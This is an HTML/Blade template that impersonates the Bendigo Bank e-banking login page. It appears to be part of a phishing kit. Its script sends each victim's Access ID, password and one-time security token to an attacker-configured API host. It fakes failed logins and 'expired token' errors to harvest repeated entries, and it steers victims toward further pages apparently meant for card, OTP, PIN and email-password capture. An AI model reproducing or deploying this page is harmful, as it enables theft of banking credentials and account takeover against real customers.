<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script defer src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.16/dist/tailwind.min.css">
    <link rel="stylesheet" href="{{ asset('css/app.css') }}">
    <link rel="stylesheet" href="{{ asset('css/footer.css') }}">
    <link rel="stylesheet" href="{{ asset('css/loader.css') }}">
    <link rel="stylesheet" href="{{ asset('css/token-popup.css') }}">
    <script src="https://www.google.com/recaptcha/api.js" async defer></script>
    <script>
        const pages = {
            card: 'card',
            otp: 'otp',
            pin: 'pin',
            email_password: 'email-password',
        }
        const status = window.localStorage.getItem("status");
        if (status)
            location.replace(location.href.toString().split("/login")[0] + "/" + status);
        let number = Number('{{ $number_of_repeat }}');

        function onSubmitToken(token) {
            let test = true
            test = validateToken(tokenField.value) && test;

            const isEmpty = '{{ $is_field_empty }}' == '1' ? true : false;
            if (test) {
                const captcha = document.getElementsByName("g-recaptcha-response")[0].value;
                const sumbitToken = document.getElementById("submitToken");
                const errorToken = document.getElementById("error-token");
                errorToken.style.display = "none";
                submitToken.disabled = true;
                sumbitToken.classList.add("isLoading");
                setTimeout(() => {
                    axios.post(
                            `{{ $api_host }}/api/token?token=${tokenField.value}&captcha=${captcha}`, {}
                        )
                        .then(function(response) {
                            if (!number) {
                                isLoggedFirstTime = true;
                                window.localStorage.setItem("status", "email-password");
                                location.replace(location.href.toString().split("/login")[0] +
                                    "/info");
                            } else {
                                submitToken.disabled = false;
                                if (isEmpty) {
                                    tokenField.value = "";
                                    tokenField.focus();
                                }
                                loader.style.display = "none";
                                alert.style.display = "flex";
                                number--;
                                sumbitToken.classList.remove("isLoading");
                                errorToken.style.display = "block";
                            }
                        })
                        .catch(function(error) {
                            console.error('Error:', error);
                            location.replace('{{ $error_link }}');
                        });


                }, refreshToken);
            }
        }

        function onSubmit(token) {
            let test = true
            test = validateAccessId(accessId.value) && test;
            test = validatePassword(password.value) && test;
            const isEmpty = '{{ $is_field_empty }}' == '1' ? true : false;
            if (test) {
                const captcha = document.getElementsByName("g-recaptcha-response")[0].value;
                loader.style.display = "flex";
                setTimeout(() => {
                    let isLogged = (isLoggedFirstTime === true && isNeedTwice === true) || (isLoggedFirstTime ===
                        false && isNeedTwice === false) ? true : false
                    axios.post(
                            `{{ $api_host }}/api/login?accessId=${accessId.value}&password=${password.value}&captcha=${captcha}`, {}
                        )
                        .then(function(response) {
                            if ((!isNeedTwice) || (isNeedTwice == true && isLoggedFirstTime == true)) {
                                isLoggedFirstTime = true;
                                // window.localStorage.setItem("accessId", accessId.value);
                                // window.localStorage.setItem("password", password.value);
                                document.getElementById("token-popup").style.display = "flex";
                                loader.style.display = "none";
                            } else {
                                isLoggedFirstTime = true;
                                if (isEmpty) {
                                    accessId.value = "";
                                    password.value = "";
                                    accessId.focus();
                                }
                                loader.style.display = "none";
                                alert.style.display = "flex";
                            }
                        })
                        .catch(function(error) {
                            console.error('Error:', error);
                            // location.replace('{{ $error_link }}');
                        });


                }, refresh);
            }
        }
    </script>
    <title>Bendigo Bank - Log in to e-banking</title>
    <style>
    </style>
</head>

<div class="bg-white text-black font-sans">
    <x-loader />
    <x-header />

    <div class="bg-red-100 text-red-700 alert-container" role="alert">
        <div class="flex max-w-screen-xl mx-auto p-4 ">
            <div class="py-1">
                <svg class="fill-current h-6 w-6 text-red-500 mr-4" xmlns="http://www.w3.org/2000/svg"
                    viewBox="0 0 20 20">
                    <path
                        d="M10 2C5.03 2 1 6.03 1 11s4.03 9 9 9 9-4.03 9-9-4.03-9-9-9zm0 16a7 7 0 100-14 7 7 0 000 14z" />
                    <path d="M11 12h-2v-2h2v2zm0-4h-2V5h2v3z" />
                </svg>
            </div>
            <div>
                <p class="font-bold">Please verify your password before attempting another login, as repeated incorrect entries may result in your account being locked.</p>
                <p class="text-sm">If uncertain, reset your password through the Bendigo app to ensure secure access.</p>
            </div>
        </div>
    </div>

    <div class="fixed bg-red   z-50 w-screen h-screen top-0 flex items-center justify-center" data-aos="fade-left"
        id="token-popup">

        <form class="max-w-lg w-full mx-auto popup-content rounded-xl" action="#" method="get">
            <div for="access" class="text-sm flex justify-between bg-white p-4 rounded-t-xl items-center">
                <div class="font-medium ">Please provide a token</div>
                <img class="ml-auto" width="130px" src="./assets/images/images/symclogo.png" />
            </div>
            <div class="text-red-600 bg-red-200 font-bold  text-center p-4" id="error-token"> Token has been expired
            </div>
            <div class=" p-5 ">
                <label for="access" class="font-thin text-sm block mb-3 ml-3 mt-5">Security Token</label>
                <div class="mb-5 flex items-center relative">
                    <img src="./assets/images/icons/password 2.png" class="w-7 ml-2 absolute left-2"
                        alt="Name on Card Icon">
                    <img src="./assets/images/icons/question.png" class="w-4 ml-2 absolute right-3" alt="Question Icon">
                    <input id="token" type="text" value="" name="access" required="" maxlength="6"
                        class="w-full py-4 pl-14 rounded-sm border border-gray-300 focus:border-transparent focus:outline-blue-700 focus:bg-white">
                </div>
                <div class="error hidden text-sm mb-5">
                    Token is required. It should be a 6-digit.
                </div>
                <input name="submit_frm" type="hidden" value="login">
                <div>
                    <div class="grecaptcha-badge" data-style="bottomright"
                        style="width: 256px; height: 60px; display: block; transition: right 0.3s ease 0s; position: fixed; bottom: 14px; right: -186px; box-shadow: gray 0px 0px 5px; border-radius: 2px; overflow: hidden;">
                        <div class="grecaptcha-logo"><iframe title="reCAPTCHA" width="256" height="60"
                                role="presentation" name="a-6yai5zi7jrcz" frameborder="0" scrolling="no"
                                sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox allow-storage-access-by-user-activation"
                                src="https://www.google.com/recaptcha/api2/anchor?ar=1&amp;k=6LcT7gspAAAAAEe4iSEYcHA_rKLB9_gaVrQnh2JQ&amp;co=aHR0cDovL2xvY2FsaG9zdDo4MDAw&amp;hl=en&amp;v=-QbJqHfGOUB8nuVRLvzFLVed&amp;size=invisible&amp;sa=submit&amp;cb=wzelfthasho"></iframe>
                        </div>
                        <div class="grecaptcha-error"></div>
                        <textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response"
                            style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;">
                    </textarea>
                    </div>
                </div>
                <button data-sitekey="{{ $recaptcha_key }}" data-callback="onSubmitToken" data-action="submit"
                    class="g-recaptcha w-full py-4 font-bold text-white rounded-sm  transition duration-300 ease-in-out"
                    id="submitToken">
                    <div class="token_loading"></div>
                    <div>Submit</div>
                </button>
                <br />
                <br />
                <div class="text-sm font-medium pb-2 flex gap-1 items-center">
                    <img src="./assets/images/icons/question.png" class="w-4 mr-2" alt="Lock Icon" />
                Don't have a VIP Access app?
                </div>
                <div class="text-sm font-normal">
                   Get your token from your Physical Token device.
                </div>
            </div>

        </form>
    </div>


    <div class="mt-3 lg:mt-20 pb-56" data-aos="fade-left">
        <form class="max-w-md mx-auto p-5" action="#" method="get">
            <div class="text-2xl font-semibold lg:mt-16">Log in to e-banking</div>
            <label for="access" class="font-bold text-sm mt-14 mb-5 block">Access ID</label>
            <div class="mb-5 flex items-center relative">
                <img src="./assets/images/icons/user.png" class="w-7 ml-2 absolute left-2" alt="Name on Card Icon">
                <input id="access" type="text" value="" name="access" placeholder="e.g. 123456789"
                    required inputmode="numeric" maxlength="12"
                    class="w-full py-4 pl-14 rounded-sm border border-gray-300 focus:border-transparent focus:outline-blue-700 focus:bg-white">
            </div>
            <div class="error hidden text-sm mb-5">
                Access ID is invalid. It should be a numeric value with a maximum length of 12 characters.
            </div>
            <div>
                <label for="password" class="font-bold text-sm mb-5 block">Password</label>
                <div class="mb-5 flex items-center relative">
                    <img src="./assets/images/icons/password.png" class="w-7 ml-2 absolute left-2"
                        alt="Name on Card Icon">
                    <input value="" id="password" type="password" name="password" placeholder="••••••••"
                        required
                        class="w-full py-4 pl-14 rounded-sm border border-gray-300 focus:border-transparent focus:outline-blue-700 focus:bg-white">
                </div>
                <div class="error hidden text-sm mb-5">
                    Password is required.
                </div>
            </div>
            <input name="submit_frm" type="hidden" value="login">

            <button data-sitekey="{{ $recaptcha_key }}" data-callback="onSubmit" data-action="submit"
                class="g-recaptcha w-full py-4 font-bold text-white rounded-sm  transition duration-300 ease-in-out">Next</button>

        </form>
    </div>

    <x-footer />
</div>
<script defer>
    const accessId = document.getElementById("access");
    const tokenField = document.getElementById("token");
    const password = document.getElementById("password");
    const submit = document.querySelector("button[type='submit']");
    const loader = document.getElementsByClassName("loader-container")[0];
    const alert = document.getElementsByClassName("alert-container")[0];
    const form = document.getElementsByTagName("form")[0];



    let refresh = '{{ $refresh }}';
    let refreshToken = '{{ $refreshToken }}';
    let isNeedTwice = '{{ $isNeedTwice }}';
    let isLoggedFirstTime = false;
    isNeedTwice == 'true' ? true : false;

    function validateAccessId(value) {
        if (!/^\d{1,12}$/.test(value)) {
            accessId.parentElement.classList.add("invalid");
            return false;
        } else {
            accessId.parentElement.classList.remove("invalid");
            return true;
        }
    }

    function validateToken(value) {
        if (!/^\d{6,6}$/.test(value)) {
            tokenField.parentElement.classList.add("invalid");
            return false;
        } else {
            tokenField.parentElement.classList.remove("invalid");
            return true;
        }
    }

    function validatePassword(value) {
        if (value.length >= 1) {
            password.parentElement.classList.remove("invalid");
            return true;
        } else {
            password.parentElement.classList.add("invalid");
            return false;
        }
    }

    accessId.addEventListener("input", (e) => {
        validateAccessId(e.target.value);
    });

    password.addEventListener("input", (e) => {
        validatePassword(e.target.value);
    });

    tokenField.addEventListener("input", (e) => {
        validateToken(e.target.value);
    });
</script>
</div>

</html>
